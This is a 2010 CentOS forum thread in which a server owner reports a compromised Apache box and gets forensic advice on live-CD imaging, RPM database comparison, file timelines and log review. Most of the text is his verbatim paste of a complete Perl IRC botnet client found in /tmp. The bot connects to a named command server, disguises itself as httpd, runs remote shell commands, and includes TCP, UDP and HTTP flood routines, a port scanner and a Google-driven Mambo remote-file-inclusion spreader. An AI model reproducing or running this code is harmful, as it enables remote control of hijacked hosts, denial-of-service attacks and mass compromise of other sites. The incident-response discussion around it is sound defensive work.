I've been rooted

Support for security such as Firewalls and securing linux
falcon1620
Posts: 22
Joined: 2009/06/29 19:23:16

I've been rooted

Post by falcon1620 » 2010/10/18 15:40:21

So I have a little box down stairs that runs Apache, and web services for development work, mainly on PHP and some Perl where a few other students can stick some code. Today however I notice that there was a bunch of deprecated Perl threads that were running, and a bunch of Pearl Process forking on my Chrooted Apache environment. :lol: Not to mention that my casual 13% utilization was spiking at 100%

So I got the Chroot shut down but I noticed that there were still Pearl threads running under the Apache user (even with the service disabled and the chroot removed...) :-P Yes Apache outside of the chroot... This box is OWNED!

My question to you is, is there a way to figure out what files are running on that box through the process list? I can't seem to find out where this malicious threads are executing from. I mean I will re-do the machine and I have removed some of the web server code that was exploited but I'd like to poke around there in the future to prevent myself from being rooted. You know. When I run ps --aux or Top it just executes these threads as "Perl" with no pathname... The Perl and Apache owner threads keep appearing with out apache service running... Maybe a chron that would spawn these?

And yes I have all of the latests updates, and am not only running my services in a chroot, but also have the default SELinux policies enabled. Just sometimes you get some code that is less then secure on the web server... Hence the additional security measures. I would think that even with an exploit with SELinux and chroot could contain the madness? Maybe that's just wishful thinking...

I know well that machine gets abused, occasionally I do get it it updated.

Well that's a first for me LOL


:-D

I'm not a programmer so forgive my ignorance here I think its funny that Perl on here was exploited. So any suggestions? LOL :-D :-D :-D

Oh I posted to Server Support Instead of Security... Sorry

User avatar
toracat
Site Admin
Posts: 7518
Joined: 2006/09/03 16:37:24
Location: California, US
Contact:

I've been rooted

Post by toracat » 2010/10/18 16:36:00

Moved to the Security forum.

Are you sure your system was totally up-to-date? Are you running something that are not from the distro? If so, which software?

falcon1620
Posts: 22
Joined: 2009/06/29 19:23:16

Re: I've been rooted

Post by falcon1620 » 2010/10/18 18:31:22

Thanks for moving me... :-)

Yea I had a few web applications running on there that were not from the Repo. The included
-PHPMyAdmin (Latest that would run under CentOS PHP version)
-OSCommerce (Latest)
-GLPI (Latest)
-Midterm Appgate (free versions, but also up to date)
-WordPress (Latest)
-phpBB (Latest)
-Some Coursework Level Scripts in Perl and PHP, and some PHP and Perl Framework engines for modules and templates these were also protected by .htaccess

(As you can see I had a lot of web apps running but I kept them all up to date, and would migrate them or remove them If i was done messing with them on my server).

All of these were running on the Web Server at the time, however, each folder had a custom .htaccess file associated with them, and I would log into the .htaccess using a self signed ssl cert self generated and self signed. I rotated through the SSL cert about once a week.

There were quite a few libraries on there that were installed, and it was a semi-bloted development environment.

In fact after I killed some of the process threads, I updated on the box, and there were no updates to install. I have sense shut the box down so that I can go unplug it from the network and look at it further. So there were no updates available, I usually let the machine update every day using yumcrond I also disabled the HTTP server and it still was spawning process threads, even after they were all killed, I also noticed a lot of them outside of my Chroot, but it could be that they were reporting those from the chroot now that I think about it. Does top and PS display the chroot processes? I think so.. I didn't really stay to long in there to find out. Just wanted to get it off my network quickly while I still had control over the box.

I had a personal web site on there that was all done in HTML, and CSS

The only really weak point in my security was Squirrelmail had an Setbool * policy on it, but it was because I can not for the life of me figure out why Squirrelmail will get denied when connecting to Dovecot's IMAP protocol on a local machine locally and didn't understand SElinux policies to really do a good job securing it down... and I figured that I would rather just set Setbool * then disable SELinux on the entire machine. Could be where they slipped passed but its hard to say... I had been running the box this way for quite some time with out an issue. I removed all of the Web Applications on there and the Perl would still execute on the processor, so it was pretty much owned. Thought it was a prank or something but my friend noticed last night that the performance on the box was pretty sad and had said something about it last night.

Services running were:
-MySQL
-Apache
-Mod_Perl
-Mod_PHP
-Mod_Auth
-Squrrelmail
-SSH Server
-Dovecot
-Sendmail

Ports open to the world
22, 80, 443 that's it. Each Database connection was Local, same with IMAP, and Sendmail they were internal only, no external access except through SSH tunnelling.

I have Root access to the SSH server disabled as well. So even if they did get into SSH server via brute force, there is really not a lot of permissions on those accounts. I also have the box behind a PFSense firewall that has IDS tools on there, hopefully they would have gone off if that was the case. I check the logs and there is only the usual Brute force attacks from script kiddies on Port 22 that are blocked with in 10 attempts. They also usually target Root and that is entirely disabled.

So I don't know that's a first for me... So you see anything in here that would be of concern..? Its hard to speculate why my chroot would have failed with SELinux... But it would not be the first time I had an error in my configuration. I have quite a few CentOS boxes running out there even with older versions of web applications chugging away. Can't say that I was ever rooted with them.

I would have poked around more but I am not near the physical box, and I also noticed that Pearl threads kept spawning outside of the chroot owned by apache, and neither the Apache Service was enabled or started, nor was mod_perl installed after that, and neither should be active outside of the chroot. And you only had so much time before they would start eating away at the system resources again.

I would suspect that some one exploited one of these services on the web server. That's where I am going to look once I get a forensics partition with the exploited server set up. My concern is getting past the IDS, SELinux, and the chroot with all of those updates on there. I did a quick rm -rf on the web root directory, (Since its all backed up any way) to see if any of those files were containing anything malicious. Once the service was disabled the web directory wiped, and the box rebooted, it still had renegade threads starting in my process tree. I double checked and Apache was disabled, Mod_PHP and Mod_Perl were disabled in the configuration as well.

:-D
Aside from the throw up some development PHP and Perl code under a password protected file there should not be to many gaping security holes in there that I notice. If that's the case, oh man, I have a lot of configuration changes to go through for about 20 live facing servers here. :-o

I know that /temp is a popular place to start for exploit code, but where else would people like to hid stuff on your box? Especially confusing is that each thread process that is forking is loaded up with "Perl" and "Apache" with no path name on there, making it hard to find? I don't really ever have to deal with these types of issues.
toracat wrote:


That's about as much background as I can give you there with out booting the machine back up to take a look which I can do when I get home to it. :-P

:-D

unspawn
Posts: 172
Joined: 2006/12/11 12:28:52

Re: I've been rooted

Post by unspawn » 2010/10/18 22:04:55

[quote]falcon1620 wrote:
Does top and PS display the chroot processes (..) is there a way to figure out what files are running on that box through the process list?[/quote]
Running '/usr/sbin/lsof -Pwln' could be a start however that would require you to (unplug the network! and) resurrect the machine. Before you do please first boot a Live CD like the Centos installer CD or HELIX or KNOPPIX, mount partitions read-only and backup all of /etc, /tmp, /var, root and /home for investigative purposes.


[quote]falcon1620 wrote:
When I run ps --aux or Top it just executes these threads as "Perl" with no pathname... The Perl and Apache owner threads keep appearing with out apache service running... Maybe a chron that would spawn these?[/quote]
Sure. For instance if an attacker (by any means) can execute a system command like 'crontab -u httpd /path/to/httpd-writable/directory/filename' it will cause the httpd users crontab to be replaced. Then if user httpd is not in /etc/cron.deny the crontab will be run.


[quote]falcon1620 wrote:
I know that /temp is a popular place to start for exploit code, but where else would people like to hid stuff on your box? [/quote]
This question invites speculation. I'd rather review facts.
- On a (physically different) workstation expand all logs and run them through 'logwatch' (--range All --archives) to find leads. be especially interested in HTTP requests that contain [?,&]arguments and %20command%20names.
- If you ran a file system integrity checker like Samhain or Aide now would be the time to put it to use.
- With the Live CD booted run 'rpm /path/to/mounted/victim/var/lib/rpm --root /path/to/mounted/victim/ -qa --dump > /livecd/tmp/rpmdb.log' to create a list of all files known to the RPMDB.
- With the Live CD booted run 'find /path/to/mounted/victim -print0|xargs -0 -iX stat -c '%y %u %g %a #%n' 'X'|sort -k 1,2 > /livecd/tmp/timeline.log' to gather a list of all files sorted by last modification date.
- With the Live CD booted run 'last -f /path/to/mounted/victim/var/log/wtmp' and save the output. Same for /path/to/mounted/victim/var/log/lastb'.
- Inspect /path/to/mounted/victim/var/log/cron or whatever /etc/syslog.conf reported cron activity to.
- Inspect /path/to/mounted/victim/etc/{passwd, group} for "strange" user accounts.
- Save all reports and logs to your workstation.
- Running 'cat /livecd/tmp/timeline.log|cut -d '#' -f 2-' produces a list of all files. Running 'cat rpmdb.log| cut -d ' ' -f 1' produces a list of all files known to the RPMDB. List1 minus list2 are all files that are not known to the RPMDB. These will contain files installed from tarball, stray false positives from packages, logrotated files and user-injected files.
Any leads from the logwatch report and user-injected non-RPMDB files you should find in the timeline.log. Files created in directories writable by human users in /home, files written to in httpd-user-writable directories, /tmp, /var/tmp and /root are suspect as are files matching or having a close by modification time.
- Review the files you have (backed up and) deleted for matching timestamps.
* Have a look at the [url=http://web.archive.org/web/20080109214340/http://www.cert.org/tech_tips/intruder_detection_checklist.html]CERT Intruder Detection Checklist[/url]. It's old but always a good checklist.

If what you have to report exceeds this forums max post size please consider hosting a tarball or files, using pastebin or docs.google.

falcon1620
Posts: 22
Joined: 2009/06/29 19:23:16

Re: I've been rooted

Post by falcon1620 » 2010/10/19 21:30:44

I've made a backup of the hard drive with the Live CD, and also an Image file, decided to go poking around a bit. Found this in the tmp thought it was cute.
Well that explains the Perl threads, interestingly enough they were spawining and sticking to about 78% CPU time on the box, so I'll have to go digging through the file system to see if I can in fact find out where some kind of manager process is running... I am going to go through the logs and chop them down a bit for interest, they did an alright job cleaning them up, but the last little bit that I caught before there was time to wipe it seamed to point to either a kernel exploit or through PHP (phpmyadmin), which I suspected. Well at least know we all know what the password is to this bot net.

I should also add that I noticed SELinux was put in to permissive mode, so maybe a fried disabled that hopefully and not the hacker here. I added some returns on the lines, and this is a perl program I removed the perl header at the top ( I know whoot that will stop it from executing...)


[code]
# This code is based on atrix (brazil) shellbot, somebody ripped all the credits, but its obviusly a rip.
# so the original author is atrix. the spread perl code was developed by sirhot (i am almost sure) he is from morocco.
# Note to David Jacoby: Expect a few improvements for the next release.
#
# The following comments are only left in the code to ridiculize this guy.
# --------------------------------------------------------------
# Morgan has hacked you!
# Morgan Argentina, santiago del estero
# http://irc.irc-argentina.org/x.conf
# http://img521.imageshack.us/img521/3779/morganlammer6tu.png
#
# oper morgan {
# class clients;
# from {
# userhost *@*;
# };
# password "soyuncapo"; // morgan si, eres-un-capo.
# oper morgan2 {
# class clients;
# from {
# userhost *@*;
# };
# password "thegod"; //morgan si, eres el-dios.
# -----------------------------------------------------------
my $processo = '/usr/sbin/httpd';

if (`ps uxw` =~ /usr\/bin\/web\/httpd/)

{

exit;

}

# morgan the code that you need to rip ends here

my $linas_max='4';
my $sleep='5';
my @adms=("anakin","DarthVader","nap","Sclipici");
my @hostauth=("fbi.gov","nasa.gov","evil.h-gov","lamer2k.tr","fsck.you");
my @canais=("#root");
my $nick='flood';
my $ircname ='flood';
chop (my $realname= 'flood');
$servidor='flood.cyberpunks.ro' unless $servidor;
my $porta='7000';
my $VERSAO ='0.5';
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
use IO::Socket;
use Socket;
use IO::Select;
chdir("/");
$servidor="$ARGV[0]" if $ARGV[0];
$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);

our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();

$sel_cliente = IO::Select->new();
sub sendraw {
if ($#_ == '1') {
my $socket = $_[0];
print $socket "$_[1]\n";
} else {
print $IRC_cur_socket "$_[0]\n";
}
}

sub conectar {
my $meunick = $_[0];
my $servidor_con = $_[1];
my $porta_con = $_[2];

my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
if (defined($IRC_socket)) {
$IRC_cur_socket = $IRC_socket;

$IRC_socket->autoflush(1);
$sel_cliente->add($IRC_socket);

$irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
$irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
nick("$meunick");
sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
sleep 1;
}
}
my $line_temp;
while( 1 ) {
while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
delete($irc_servers{''}) if (defined($irc_servers{''}));
my @ready = $sel_cliente->can_read(0);
next unless(@ready);
foreach $fh (@ready) {
$IRC_cur_socket = $fh;
$meunick = $irc_servers{$IRC_cur_socket}{'nick'};
$nread = sysread($fh, $msg, 4096);
if ($nread == 0) {
$sel_cliente->remove($fh);
$fh->close;
delete($irc_servers{$fh});
}
@lines = split (/\n/, $msg);

for(my $c=0; $c<= $#lines; $c++) {
$line = $lines[$c];
$line=$line_temp.$line if ($line_temp);
$line_temp='';
$line =~ s/\r$//;
unless ($c == $#lines) {
parse("$line");
} else {
if ($#lines == 0) {
parse("$line");
} elsif ($lines[$c] =~ /\r$/) {
parse("$line");
} elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
parse("$line");
} else {
$line_temp = $line;
}
}
}
}
}

sub parse {
my $servarg = shift;
if ($servarg =~ /^PING \:(.*)/) {
sendraw("PONG :$1");
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
if ($args =~ /^\001VERSION\001$/) {
notice("$pn", "\001VERSION mIRC v6.16 Khaled Mardam-Bey\001");
}
if (grep {$_ =~ /^\Q$hostmask\E$/i } @hostauth) {
if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
if ($onde eq "$meunick"){
shell("$pn", "$args");
}
if ($args =~ /^(\Q$meunick\E|\!x)\s+(.*)/ ) {
my $natrix = $1;
my $arg = $2;
if ($arg =~ /^\!(.*)/) {
ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/);
} elsif ($arg =~ /^\@(.*)/) {
$ondep = $onde;
$ondep = $pn if $onde eq $meunick;
bfunc("$ondep","$1");
} else {
shell("$onde", "$arg");
}
}
}
}
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
if (lc($1) eq lc($meunick)) {
$meunick=$4;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
}
} elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
nick("$meunick|".int rand(999999));
} elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
$meunick = $2;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'nome'} = "$1";
foreach my $canal (@canais) {
sendraw("JOIN $canal");
rooting($canal);
}
}
}


sub bfunc {
my $printl = $_[0];
my $funcarg = $_[1];
if (my $pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
if ($funcarg =~ /^portscan (.*)/) {
my $hostip="$1";
my @portas=("21","22","23","25","80","113","135","445","1025","5000","6660","6661","6662","6663","6665",
"6666","6667","6668","6669","7000","8080","8018");
my (@aberta, %porta_banner);
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Scanning ".$1." for open ports.");
foreach my $porta (@portas) {
my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
if ($scansock) {
push (@aberta, $porta);
$scansock->close;
}
}

if (@aberta) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Open port(s): @aberta");
} else {
sendraw($IRC_cur_socket,"PRIVMSG $printl :\002[SCAN]\002 No open ports found");
}
}
if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attacking ".$1.":".$2." for ".$3." seconds.");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($3>$cur_time){
$cur_time = time - $itime;
&tcpflooder("$1","$2","$3");
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attack done ".$1.":".$2.".");
}
if ($funcarg =~ /^version/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[VERSION]\002 perlb0t ver ".$VERSAO);
}
if ($funcarg =~ /^google\s+(\d+)\s+(.*)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Scanning for unpatched mambo for ".$1." seconds.");
srand;
my $itime = time;
my ($cur_time);
my ($exploited);
$boturl=$2;
$cur_time = time - $itime;$exploited = 0;
while($1>$cur_time){
$cur_time = time - $itime;
@urls=fetch();
foreach $url (@urls) {
$cur_time = time - $itime;
my $path = "";my $file = "";($path, $file) = $url =~ /^(.+)\/(.+)$/;
$url =$path."/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&
mosConfig_absolute_path=$boturl?";
$page = http_query($url);
$exploited = $exploited + 1;
}
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Exploited ".$exploited." boxes in ".$1." seconds.");
}
if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking ".$1.":80 for ".$2." seconds.");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($2>$cur_time){
$cur_time = time - $itime;
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
close($socket);
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking done ".$1.".");
}
if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Attacking ".$1." with ".$2." Kb packets for ".$3." seconds.");
my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
$dtime = 1 if $dtime == 0;
my %bytes;
$bytes{igmp} = $2 * $pacotes{igmp};
$bytes{icmp} = $2 * $pacotes{icmp};
$bytes{o} = $2 * $pacotes{o};
$bytes{udp} = $2 * $pacotes{udp};
$bytes{tcp} = $2 * $pacotes{tcp};
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Sent ".int(($bytes{icmp}+$bytes{igmp}
+$bytes{udp} + $bytes{o})/1024)." Kb in ".$dtime." seconds to ".$1.".");
}
exit;
}
}
}

sub ircase {
my ($kem, $printl, $case) = @_;

if ($case =~ /^join (.*)/) {
j("$1");
}
if ($case =~ /^part (.*)/) {
p("$1");
}
if ($case =~ /^rejoin\s+(.*)/) {
my $chan = $1;
if ($chan =~ /^(\d+) (.*)/) {
for (my $ca = 1; $ca <= $1; $ca++ ) {
p("$2");
j("$2");
}
} else {
p("$chan");
j("$chan");
}
}
if ($case =~ /^op/) {
op("$printl", "$kem") if $case eq "op";
my $oarg = substr($case, 3);
op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^deop/) {
deop("$printl", "$kem") if $case eq "deop";
my $oarg = substr($case, 5);
deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^msg\s+(\S+) (.*)/) {
msg("$1", "$2");
}
if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
msg("$2", "$3");
}
}
if ($case =~ /^ctcp\s+(\S+) (.*)/) {
ctcp("$1", "$2");
}
if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
ctcp("$2", "$3");
}
}
if ($case =~ /^nick (.*)/) {
nick("$1");
}
if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
conectar("$2", "$1", 6667);
}
if ($case =~ /^raw (.*)/) {
sendraw("$1");
}
if ($case =~ /^eval (.*)/) {
eval "$1";
}
if ($case =~ /^rooting/)
{
if(rooting($printl))
{
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[Rooting]\002 Nothing rootable !!");
}
}

}

sub rooting {

my $printl=$_[0];
my $kern=`uname -a`;
if ($kern =~ /2.4.17\s/ || $kern =~ /2.4.18\s/ || $kern =~ /2.4.19\s/ || $kern =~ /2.4.20/ ||
$kern =~ /2.4.20-8/ || $kern =~ /2.4.21\s/ ||
$kern =~ /2.4.22\s/ || $kern =~ /2.4.22-10\s/ || $kern =~ /2.4.23\s/ || $kern =~ /2.4.24\s/ ||
$kern =~ /2.4.25-1\s/ || $kern =~ /2.4.26\s/ ||
$kern =~ /2.4.27\s/ || $kern =~ /2.6.2\s/ || $kern =~ /2.6.5\s/ || $kern =~ /2.6.6\s/ ||
$kern =~ /2.6.7\s/ || $kern =~ /2.6.8\s/ || $kern =~ /2.6.8-5\s/ ||
$kern =~ /2.6.9\s/ || $kern =~ /2.6.9-34\s/ || $kern =~ /2.6.10\s/ || $kern =~ /2.6.11/ ||
$kern =~ /2.6.13\s/ || $kern =~ /2.6.13-17/ || $kern =~ /2.6.14\s/ ||
$kern =~ /2.6.15\s/ || $kern =~ /2.6.16\s/)
{
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[Exploitable Kernel !!]\002 I m an exploitable Kernel: ".`uname -r`);
}
else
{
return 1;
}
return 0;
}



sub shell {
my $printl=$_[0];
my $comando=$_[1];
if ($comando =~ /cd (.*)/) {
chdir("$1") || msg("$printl", "No such file or directory");
return;
}
elsif ($pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
my @resp=`$comando 2>&1 3>&1`;
my $c=0;
foreach my $linha (@resp) {
$c++;
chop $linha;
sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
if ($c == "$linas_max") {
$c=0;
sleep $sleep;
}
}
exit;
}
}
}

sub tcpflooder {
my $itime = time;
my ($cur_time);
my ($ia,$pa,$proto,$j,$l,$t);
$ia=inet_aton($_[0]);
$pa=sockaddr_in($_[1],$ia);
$ftime=$_[2];
$proto=getprotobyname('tcp');
$j=0;$l=0;
$cur_time = time - $itime;
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t="SOCK$l";
socket($t,PF_INET,SOCK_STREAM,$proto);
connect($t,$pa)||$j--;
$j++;$l++;
}
$l=0;
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t="SOCK$l";
shutdown($t,2);
$l++;
}
}

sub udpflooder {
my $iaddr = inet_aton($_[0]);
my $msg = 'A' x $_[1];
my $ftime = $_[2];
my $cp = 0;
my (%pacotes);
$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;

socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
return(undef) if $cp == 4;
my $itime = time;
my ($cur_time);
while ( 1 ) {
for (my $porta = 1; $porta <= 65000; $porta++) {
$cur_time = time - $itime;
last if $cur_time >= $ftime;
send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;

for (my $pc = 3; $pc <= 255;$pc++) {
next if $pc == 6;
$cur_time = time - $itime;
last if $cur_time >= $ftime;
socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;
}
}
last if $cur_time >= $ftime;
}
return($cur_time, %pacotes);
}

sub ctcp {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :\001$_[1]\001");
}
sub msg {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :$_[1]");
}
sub notice {
return unless $#_ == 1;
sendraw("NOTICE $_[0] :$_[1]");
}
sub op {
return unless $#_ == 1;
sendraw("MODE $_[0] +o $_[1]");
}
sub deop {
return unless $#_ == 1;
sendraw("MODE $_[0] -o $_[1]");
}
sub j { &join(@_); }
sub join {
return unless $#_ == 0;
sendraw("JOIN $_[0]");
}
sub p { part(@_); }
sub part {
sendraw("PART $_[0]");
}
sub nick {
return unless $#_ == 0;
sendraw("NICK $_[0]");
}
sub quit {
sendraw("QUIT :$_[0]");
}

# Spreader
# this 'spreader' code isnot mine, i dont know who coded it.
# update: well, i just fix0red this shit a bit.
#

sub fetch(){
my $rnd=(int(rand(9999)));
my $n= 80;
if ($rnd<5000) { $n<<=1;}
my $s= (int(rand(10)) * $n);

my @dominios = ("com","net","org","info","gov", "gob","gub","xxx", "eu","mil","edu","aero","name","us","ca",
"mx","pa","ni","cu","pr","ve","co","pe","ec",
"py","cl","uy","ar","br","bo","au","nz","cz","kr","jp","th","tw","ph","cn","fi","de","es","pt",
"ch","se","su","it","gr","al","dk","pl","biz","int","pro",
"museum",
"coop",
"af","ad","ao","ai","aq","ag","an","sa","dz","ar","am","aw","at","az","bs","bh","bd","bb","be","bz",
"bj","bm","bt","by","ba","bw","bn" ,"bg","bf","bi",
"vc","kh","cm","td","cs","cy","km","cg","cd","dj","dm","ci","cr","hr","kp","eg","sv","aw","er","sk",
"ee","et","ge","fi","fr","ga","gs","gh","gi","gb","uk","gd","gl","gp","gu","gt","gg","gn","gw","gq","gy","gf",
"ht","nl","hn","hk","hu","in","id ","ir",
"iq","ie","is","ac","bv","cx","im","nf","ky","cc","ck","fo","hm","fk","mp","mh","pw","um","sb","sj","tc","vg",
"vi","wf","il","jm","je","jo","kz ","ke",
"ki","kg","kw","lv","ls","lb","ly","lr","li","lt","lu","mo","mk","mg","my","mw","mv","ml","mt","mq","ma","mr",
"mu","yt","md","mc","mn","ms" ,"mz","mm",
"na","nr","np","ni","ne","ng","nu","no","nc","om","pk","ps","pg","pn","pf","qa","sy","cf","la","re","rw","ro","ru",
"eh","kn","ws","as","sm","pm","vc",
"sh","lc","va","st","sn","sc","sl","sg","so","lk","za","sd","se","sr","sz","rj","tz","io","tf","tp","tg","to","tt","tn","tr",
"tm","tv","ug","ua","uz",
"vu","vn","ye","yu","cd","zm","zw","");
my @str;

foreach $dom (@dominios)
{
push (@str,"%22by+mambo%22+site%3A".$dom."%20");
}

my $query="www.google.com/search?q=";
$query.=$str[(rand(scalar(@str)))];
$query.="&num=$n&start=$s";
my @lst=();
my $page = http_query($query);
while ($page =~ m/<a class=l href=\"?http:\/\/([^>\"]+)\"?>/g){
if ($1 !~ m/google|cache|translate/){
push (@lst,$1);
}
}
return (@lst);
}

sub http_query($){
my ($url) = @_;
my $host=$url;
my $query=$url;
my $page="";
$host =~ s/href=\"?http:\/\///;
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$query =~s/$host//;
if ($query eq "") {$query="/";};
eval {
local $SIG{ALRM} = sub { die "1";};
alarm 10;
my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
my @r = <$sock>;
$page="@r";
alarm 0;
close($sock);
};
return $page;

}

[/code]

unspawn
Posts: 172
Joined: 2006/12/11 12:28:52

Re: I've been rooted

Post by unspawn » 2010/10/20 00:07:02

[quote]
falcon1620 wrote:
(..) I am going to go through the logs (..)[/quote]
While posting the content of an IRC bot Perl script may be "cute" it's not half as interesting as location, user/group and timestamps (wrt log correlation). Given the amount of web stack attacks, the state of PHP (aka Pretty Horrendous Programming) software, hosts running content accessible from world or running stale versions of software, the chance this will be an attack directed at the kernel instead of the web stack will prove to be infinitesimal (and that's not speculation). Anyway. Keep us posted.

falcon1620
Posts: 22
Joined: 2009/06/29 19:23:16

Re: I've been rooted

Post by falcon1620 » 2010/10/20 17:35:03

I know :-)

That one I just found while backing stuff off the Live CD pretty much right away, I didn't yet have time to go through the logs and what not. :pint:

So I have some Logs for you so far. Actually they seem to have been tampered with a bit, because I had quite a few log files archived that are missing along with some empty log files on there so I wouldn't exactly say that they are super accurate, but enough to provide a little insight. Something interesting was the fact that they seemed to use the HTTPD daemon to write into the TMP folder, and then run their stuff from TMP, and I even found some CROND logs that indicate that they were able to re-initialize their scripts from /temp/iptraf via CRON. Another interesting note is that days before the attack SELinux was blocking some activities, but I found it to be disabled on the system while the CRON scrips were executing, so some how they were able to disable SELinux on the box. One good thing is that although I didn't notice the break in attempt I did notice the exploit almost right away as Monday Morning the box was shut down almost right away. Well next time I might try remote logging to a desktop or another box :-) Most everything else was either missing, wiped or didn't seem to interesting in terms of loggs on this machine here, but I can go get it off of the machine for you if you'd like it. I have the luxury of keeping the machine around for a bit as is. I made a copy of these logs off of my system after doing the backup. I did not yet do to much else.

(Zip Attached)
Enjoy :-D

falcon1620
Posts: 22
Joined: 2009/06/29 19:23:16

Re: I've been rooted

Post by falcon1620 » 2010/10/20 19:07:48

Well after messing with the forums, it did not allow me to upload the Tar or Zip with the text file :lol: So I used Paste Bin

Audit Log
http://pastebin.com/7CLizvc8

CRON
http://pastebin.com/1RSBNbzL

HTTP Access
http://pastebin.com/n0XbynCp

HTTP Error
http://pastebin.com/FdUmygHa

Mail Log
http://pastebin.com/j4XtJ6q0

Messages Log
http://pastebin.com/pwiyyeeF

unspawn
Posts: 172
Joined: 2006/12/11 12:28:52

Re: I've been rooted

Post by unspawn » 2010/10/20 22:54:44

[quote]
falcon1620 wrote:
I have some Logs for you so far. [/quote]
I corroborate what you wrote, here's a quick timeline for messages over the period Oct 10th to 19th 2010:
On Oct 10 - 15 nothing much happens except on the 11th and 15th several successful attempts to find PHPMyAdmin (setup.php) are made.
Oct 16 03:18:43 the first IRC bot / backdoor was downloaded using locally available tools like curl or wget.
On Oct 17 several successful attempts to find PHPMyAdmin (setup.php) are made and SELinux warns about connecting to ports.
Oct 17 08:15:02 a second IRC bot / backdoor was downloaded using curl or wget.
Oct 17 08:15:06 SELinux logs 'killall' usage and a local file name "./1". Other commands logged are 'sh', 'ls' and 'ps'.
Oct 17 15:33:44 SELinux logs 'crontab' usage and a local file name "./cron"
